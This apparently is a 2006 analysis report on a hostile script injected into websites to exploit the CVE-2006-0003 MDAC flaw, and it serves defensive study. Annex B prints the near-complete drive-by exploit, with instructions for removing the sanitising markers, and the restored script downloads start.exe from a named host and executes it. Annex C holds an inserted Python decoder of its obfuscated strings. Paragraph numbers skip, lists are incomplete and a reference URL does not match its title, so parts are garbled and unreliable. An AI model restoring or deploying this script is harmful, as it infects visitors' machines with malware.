10 May 06
IH&AA Supervisor
ANALYSIS REPORT - HOSTILE SCRIPT (CVE-2006-0003)
INTRODUCTION
1. (U) Recently it appears that several websites were compromised and a hostile
script inserted into the HTML source; follow-up investigation appears to indicate that
the compromises in question may have occurred sometime in April 2006.
2. (U) In order to determine the nature of the threat and the vulnerability
associated with the hostile code, initial analysis of this threat was conducted in the
author's personal computer laboratory.
AIM
5. (U) VMWare was utilized to emulate both patched and unpatched Windows
XP/Windows 2000 platforms; the virtual machines were reinitialized after each visit
in order to ensure that the results were unadulterated.
6. (U) Whilst loading the compromised webpage, a hostile script embedded in
the page's HTML source (refer to annex B) runs and attempts to install malware
designated "start.exe" from one of the following URIs (the URIs are purposely broken
to prevent accidental infection):
a. h t t p://dnv-counter.com/trf/start.exe; or
b. h t t p://us-counter.counter.com/trf/start.exe.
7. (U) In addition to downloading the malware in question, the hostile code also
appears to incorporate a web counter facility; this is conceivably used by the entity
responsible for the malware in order to record the number of compromised hosts.
8. (U) The following patch levels and operating systems were tested in the
course of this investigation; current patches appear to be effective in preventing
exploitation by the hostile script:
a. McAfee - PWS-JA;
b. Norton - Trojan.Download;
10. (U) The script in question contained several obfuscated strings; obfuscation of
hostile code is a very common technique used to evade detection and hinder
analysis. All of the obfuscated and reconstituted strings found in the hostile script are
demonstrated in annex C.
11. (U) One of the reconstituted strings appeared to be a Class ID[1] (clsid)
designated "BD96C556-65A3-11D0-983A"; this clsid corresponds to the client-side
RDS.DataSpace[2] object.
12. (U) The hostile code appears to specifically address the RDS.DataSpace
object, which is deployed in Windows installations as an MDAC[3] component.
Considering this, the script clearly exploits the CVE-2006-0003 vulnerability[i]; the
patches associated with Microsoft Security Bulletin MS06-014[ii], issued on 11 April
2006, address this vulnerability.
13. (U) This exploit is a potential threat to the organization's network assets for
the following reasons:
b. the organization's current patch level does not include the patches
associated with the MS06-014 vulnerability.
14. (U) As a result of the conclusions reached from the analysis of this threat, the
following recommendations are hereby submitted for consideration:
[1] A clsid ("Class ID") is a globally unique identifier that serves to identify a COM ("Component Object
Model") class object; COM is a Microsoft platform for software componentry that enables interprocess
communication and dynamic object creation in any programming language that supports the technology.
[2] RDS (Remote Data Services) is a set of programming interfaces from Microsoft that enables users to
update data on the Internet or intranets from their ActiveX-enabled browser.
[3] MDAC (Microsoft Data Access Components) is a package of database drivers from Microsoft used for
connecting client PCs to databases in servers.
15. (U) Any questions regarding this report may be addressed to the
undersigned.
//signed//
Attachments:
Annexes A-C
Annex A - Laboratory Configuration
(U) The laboratory configuration utilized for the analysis associated with this
report is demonstrated in the diagram below; the "Victim" host uses VMWare to emulate
patched/unpatched versions of Windows XP Pro and Windows 2000.
[Diagram - laboratory network, top to bottom:]
    Internet
      |
    Receive-Only CAT5 Hub ---- External IDS/Sniffer
      |
    Router
      |
    Receive-Only CAT5 Hub ---- Internal IDS/Sniffer
      |
    Victim
Annex B - Hostile Script
The sanitized version of the hostile script in question may be found below; should
it be necessary to restore the script's functionality for lab purposes, simply delete all the
[DELETE THIS] strings.
<script>
function f[DELETE THIS](b, a, c) { return a + b + c; }
function g[DELETE THIS](b, a) { return a + b; }
var s[DELETE THIS] = new Array
(
    "",
    "start.[DELETE THIS]exe",
    "http://[DELETE THIS]dnv-counter.com/trf/blank.html",
    "object[DELETE THIS]",
    "classid[DELETE THIS]",
    f[DELETE THIS]("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"),
        g("9E36", "4FC2")),
    g[DELETE THIS](f("ft.XMLH", "oso", "TTP"), "Micr"),
    f[DELETE THIS]("E", "G", "T"),
    f[DELETE THIS](g(".Str", "odb"), "Ad", "eam"),
    f[DELETE THIS](g(".She", "ipt"), "WScr", "ll"),
    "[DELETE THIS]PROCESS",
    "[DELETE THIS]TMP",
    "[DELETE THIS]/[^/]*$",
    "[DELETE THIS]/",
    "[DELETE THIS]\\"
);
a = [DELETE THIS]document.createElement(s[3]);
a.setAttribute[DELETE THIS](s[4], s[5]);
with[DELETE THIS](a.CreateObject(s[6], s[0]))
{
    open[DELETE THIS](s[7], location.href.replace(new RegExp[DELETE THIS](s[12]),
        s[13] + s[1]), false);
    send[DELETE THIS]();
    if[DELETE THIS](status < 400)
        with[DELETE THIS](a.CreateObject(s[8], s[0]))
        {
            Type[DELETE THIS] = 1;
            Open[DELETE THIS]();
            Write[DELETE THIS](responseBody);
            with[DELETE THIS](a.CreateObject(s[9], s[0]))
            {
                c[DELETE THIS] = Environment[DELETE THIS](s[10])(s[11]) + s[14] + s[1];
                SaveToFile[DELETE THIS](c, 2);
                Exec[DELETE THIS](c);
            }
        }
}
location.replace[DELETE THIS](s[2]);
// -->
</script>
</html>
<!-- Start of [DELETE THIS]StatCounter Code -->
<script type="text/[DELETE THIS]javascript" language[DELETE THIS]="[DELETE THIS]javascript">
var sc_project[DELETE THIS]=1504492;
var sc_invisible[DELETE THIS]=1;
var sc_partition[DELETE THIS]=13;
var sc_security=[DELETE THIS]"f5ae647d";
</script>
Annex C -
Several obfuscated strings were noted in the script; the strings, both obfuscated
and reconstituted, are demonstrated below.
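The reconstitution of these strings, and the point made in paragraph 10 that the
obfuscation defeats simple pattern matching, can be reproduced mechanically. The
Python program below is an added example for this report; it is not part of the
original analysis or of the hostile script. It transcribes the two concatenation
helpers f() and g() from annex B and the five obfuscated expressions (s[5] to s[9])
with the sanitizing "[DELETE THIS]" markers removed, evaluates them with a small
AST walker rather than eval(), and then runs a set of plain substring indicators
(assumed here, chosen from the findings in paragraphs 11 and 12) against both the raw
expressions and the reconstituted strings. The plain URL entries of the array are
deliberately left out so that nothing live is reproduced.

```python
import ast

# Added example, not the report's own code. The two helpers are a direct transcription
# of f() and g() from annex B; note that the malware author joins the arguments in a
# different order from the call order, which is the whole "obfuscation".

def f(b, a, c):
    """Annex B helper: result is a + b + c, not b + a + c."""
    return a + b + c


def g(b, a):
    """Annex B helper: result is a + b."""
    return a + b


# The obfuscated expressions exactly as they appear in annex B (sanitizing markers
# removed), keyed by the index each one occupies in the script's s[] array.
OBFUSCATED = {
    5: 'f("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2"))',
    6: 'g(f("ft.XMLH", "oso", "TTP"), "Micr")',
    7: 'f("E", "G", "T")',
    8: 'f(g(".Str", "odb"), "Ad", "eam")',
    9: 'f(g(".She", "ipt"), "WScr", "ll")',
}

# Assumed indicator strings an analyst might search a suspect page for; they are taken
# from the findings in paragraphs 11 and 12 of the report.
SIGNATURES = [
    "BD96C556-65A3-11D0-983A",
    "Microsoft.XMLHTTP",
    "Adodb.Stream",
    "WScript.Shell",
]


def _eval_node(node):
    """Evaluate one expression node, allowing only string literals and calls to f/g.

    The JavaScript and Python syntax of these particular expressions coincide, so
    Python's own parser can be used; anything outside this tiny grammar is rejected.
    """
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
        args = [_eval_node(arg) for arg in node.args]
        if node.func.id == "f" and len(args) == 3:
            return f(*args)
        if node.func.id == "g" and len(args) == 2:
            return g(*args)
    raise ValueError("unsupported construct in obfuscated expression")


def reconstitute(expr):
    """Return the plain string that one obfuscated expression builds at run time."""
    return _eval_node(ast.parse(expr, mode="eval").body)


def reconstitute_all():
    """Map each s[] index to its reconstituted string."""
    return {index: reconstitute(expr) for index, expr in OBFUSCATED.items()}


def matching_signatures(text):
    """Return the indicators that occur verbatim in the given text."""
    return [sig for sig in SIGNATURES if sig in text]


if __name__ == "__main__":
    raw_source = "\n".join(OBFUSCATED.values())
    print("indicators found in the raw obfuscated source:", matching_signatures(raw_source))
    plain = reconstitute_all()
    for index, value in plain.items():
        print(f"s[{index}] = {value!r}")
    print("indicators found after reconstitution:",
          matching_signatures("\n".join(plain.values())))
```

Run as a script, the program shows that none of the four indicators match the
obfuscated source text while all four match the reconstituted strings, which is why
detection of this script has to operate on the decoded values (or on the run-time
behaviour) rather than on the page source alone.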
References:
[i] Common Vulnerabilities and Exposures. "CVE-2006-0003". Online document. Apr 11, 2006.
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0003.
[ii] Microsoft Technet. "Microsoft Security Bulletin MS06-014". Online document. Apr 11, 2006.
http://securityresponse.symantec.com/avcenter/reference/blended.attacks.pdf.